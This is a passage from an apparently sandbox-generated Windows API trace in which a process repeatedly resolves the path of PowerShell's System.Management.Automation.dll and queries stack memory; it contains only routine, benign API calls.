lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.887] VirtualQuery (in: lpAddress=0x13d214, lpBuffer=0x13e214, dwLength=0x1c | out: lpBuffer=0x13e214*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.887] GetLastError () returned 0x0 [0089.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] VirtualQuery (in: lpAddress=0x13d214, lpBuffer=0x13e214, dwLength=0x1c | out: lpBuffer=0x13e214*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] VirtualQuery (in: lpAddress=0x13d214, lpBuffer=0x13e214, dwLength=0x1c | out: lpBuffer=0x13e214*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.888] GetLastError () returned 0x0 [0089.888] VirtualQuery (in: lpAddress=0x13ce44, lpBuffer=0x13de44, dwLength=0x1c | out: lpBuffer=0x13de44*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.888] VirtualQuery (in: lpAddress=0x13ce80, lpBuffer=0x13de80, dwLength=0x1c | out: lpBuffer=0x13de80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.889] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.890] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.890] VirtualQuery (in: lpAddress=0x13cfec, lpBuffer=0x13dfec, dwLength=0x1c | out: lpBuffer=0x13dfec*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.890] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.890] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.890] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.890] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.890] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xcd00c421, Data2=0x8006, Data3=0x4a6a, Data4=([0]=0xac, [1]=0x93, [2]=0xd7, [3]=0x3, [4]=0x60, [5]=0x13, [6]=0x1d, [7]=0x9b))) returned 0x0 [0089.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.890] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.891] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: 